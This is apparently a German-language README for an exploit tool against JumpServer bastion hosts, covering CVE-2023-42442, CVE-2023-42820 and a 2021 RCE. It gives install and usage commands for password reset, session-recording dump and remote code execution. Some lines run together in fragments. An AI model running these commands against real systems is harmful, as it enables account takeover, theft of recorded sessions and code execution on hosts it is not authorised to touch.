
JumpServer Bastion-Host – nicht autorisierte umfassende Schwachstellenausnutzung, Exploit für CVE-2023-42442 / CVE-2023-42820 / RCE 2021
Haftungsausschluss: Dieses Tool ist ausschließlich für rechtmäßig autorisierte Unternehmenssicherheitsmaßnahmen bestimmt. Bei der Verwendung dieses Tools zur Überprüfung müssen Sie sicherstellen, dass die Maßnahmen den örtlichen Gesetzen und Vorschriften entsprechen und eine ausreichende Genehmigung eingeholt wurde. Verwenden Sie es nicht gegen nicht autorisierte Ziele.
Falls Sie während der Nutzung dieses Tools rechtswidrige Handlungen durchführen, müssen Sie die entsprechenden Konsequenzen selbst tragen. Wir übernehmen keinerlei rechtliche oder damit verbundene Haftung.
JumpServer-Bastion-Host umfassende Exploit-Suite
python3 -m pip install -r requirements.txt
--user und --email angegeben werden.python3 blackjump.py reset https://vulerability

<uuid4>.tar-Datei im Verzeichnis output/ kann mit dem JumpServer-Player abgespielt werdenpython3 blackjump.py dump https://vulerability
e
python3 blackjump.py rce http(s)://vulerability

python3 blackjump.py {reset,dump,rce} -h